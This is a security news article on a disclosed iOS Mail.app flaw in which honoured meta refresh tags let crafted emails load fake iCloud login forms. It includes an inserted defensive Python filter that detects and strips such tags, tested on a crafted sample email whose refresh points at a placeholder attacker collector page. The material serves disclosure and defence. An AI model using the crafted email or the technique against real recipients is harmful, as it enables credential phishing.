Serious Flaw in iOS Mail App Exposes Users to Phishing Attacks

The email client shipped with Apple’s iOS mobile operating system is affected by a vulnerability that can be exploited to load arbitrary remote HTML content inside the application, a researcher has warned.

Czech researcher Jan Souček published proof-of-concept (PoC) code and a video earlier this week to demonstrate his findings.

The expert discovered in January that the iOS email client (Mail.app) honors the <meta http-equiv=refresh> HTML tag in email messages instead of ignoring it. Because the tag instructs the renderer to navigate to a URL the sender chooses, an attacker can craft an email that, when opened, makes Mail.app fetch and display HTML from an attacker-controlled server.

“JavaScript is disabled in this UIWebView, but it is still possible to build a functional password ‘collector’ using simple HTML and CSS,” Souček said.

The researcher has published a video in which he shows how an attacker can send out a specially crafted email that prompts recipients to enter their iCloud credentials. The username and password collected from the victim are then sent back to the attacker.

Users noted on Hacker News that such an attack is likely to work against many people because it is not uncommon for iOS users to be asked to re-enter their iCloud credentials, and the genuine dialog box designed by Apple is easy to replicate with plain HTML and CSS.

Souček has published the source code for an iOS 8.3 “inject kit” on GitHub. The expert has pointed out that this is just an example to demonstrate the existence of the vulnerability, which can be leveraged for other attacks as well, not just credentials harvesting.

“The vulnerability can be used for anything that requires HTML tags not supported by Mail.app,” Souček explained.
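The practical defense on the mail-gateway or mail-client side is to treat a refresh directive in an HTML part as hostile: find it, extract where it points, and strip it before the message is rendered. The following is an added example written for this article, not the researcher's PoC or anything published by Apple. The message, the sender addresses and the attacker domain (attacker.example) are constructed for the demonstration. It handles the spelling variants a filter has to expect (attribute-name case, `URL=` vs `url=`, quoted or unquoted targets, self-closing tags) rather than only the canonical form.

```python
"""Detect and neutralize <meta http-equiv="refresh"> in HTML mail parts.

Added example for a mail filter. The sample message below is constructed
for this demonstration; the attacker domain is a placeholder.
"""
import email
import re
from email import policy
from html.parser import HTMLParser

# Constructed crafted message: one text/html part carrying a refresh tag
# in mixed case with an unquoted, "URL="-prefixed target.
SAMPLE_EML = """\
From: sender@example.com
To: victim@example.com
Subject: Your account
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><head>
<meta HTTP-EQUIV="Refresh" content="0; URL=https://attacker.example/collector.html" />
</head><body>Loading...</body></html>
"""

# content="<delay>[; [url=]<target>]", tolerant of whitespace, case and quotes.
_CONTENT_RE = re.compile(
    r"^\s*(?P<delay>\d+)\s*(?:;\s*(?:url\s*=\s*)?['\"]?(?P<url>[^'\"]*?)['\"]?\s*)?$",
    re.IGNORECASE,
)

# Whole-tag matcher used for stripping; attribute order does not matter.
_META_REFRESH_TAG_RE = re.compile(
    r"<meta\b[^>]*http-equiv\s*=\s*['\"]?refresh['\"]?[^>]*>",
    re.IGNORECASE,
)


class MetaRefreshFinder(HTMLParser):
    """Collect (delay, url) for every <meta http-equiv=refresh> seen.

    HTMLParser lowercases attribute names and strips quotes for us, and
    routes self-closing <meta .../> through handle_starttag as well.
    """

    def __init__(self):
        super().__init__()
        self.refreshes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "meta":
            return
        attr = {(k or "").lower(): (v or "") for k, v in attrs}
        if attr.get("http-equiv", "").strip().lower() != "refresh":
            return
        m = _CONTENT_RE.match(attr.get("content", ""))
        if m:
            self.refreshes.append((int(m.group("delay")), m.group("url") or None))
        else:
            # Malformed content attribute: still a refresh directive, so flag it.
            self.refreshes.append((None, None))


def find_meta_refresh(html):
    """Return a list of (delay, url) tuples found in an HTML string."""
    parser = MetaRefreshFinder()
    parser.feed(html)
    parser.close()
    return parser.refreshes


def neutralize_meta_refresh(html):
    """Remove every refresh tag; return (cleaned_html, number_removed)."""
    return _META_REFRESH_TAG_RE.subn("", html)


def scan_message(raw_message):
    """Walk all text/html parts of an RFC 822 message and report refreshes."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        for delay, url in find_meta_refresh(part.get_content()):
            findings.append({"delay": delay, "url": url})
    return findings


if __name__ == "__main__":
    for hit in scan_message(SAMPLE_EML):
        print("meta refresh -> delay=%s url=%s" % (hit["delay"], hit["url"]))
```

`scan_message` is the detection side: it reports a delay of 0 and the collector URL for the sample, which is what you would log or use to block the message. `neutralize_meta_refresh` is the sanitizing side for a gateway that rewrites rather than drops mail. The tag regex assumes no literal `>` inside attribute values; for a production filter, strip via a real HTML sanitizer and keep the regex only as a belt-and-braces check.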

The researcher said he reported the flaw to Apple back in January via the company’s Radar bug tracking system. He has now decided to publicly disclose the vulnerability because Apple has failed to take any action.

It’s worth noting that Apple released the first iOS 9 Beta and iOS 8.4 Beta 4 this week, but it’s unclear if these versions address the vulnerability. Even if they do fix the flaw, these variants are currently only available to developers.

Independent security analyst Graham Cluley has pointed out that the code published by the researcher might be put to good use by malicious hackers and identity thieves.

“Although I can understand his frustration with Apple’s lack of response for fixing the issue, Soucek could have applied pressure to the company by demonstrating the flaw to the tech media, rather than releasing exploit code for potential misuse,” Cluley wrote in a blog post for Tripwire. “Meanwhile, as we wait for Cupertino to roll out a patch, it would be wisest to either exercise extreme caution whenever an unexpected pop-up appears while perusing our Mail inbox, or use a third-party email app instead.”

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.
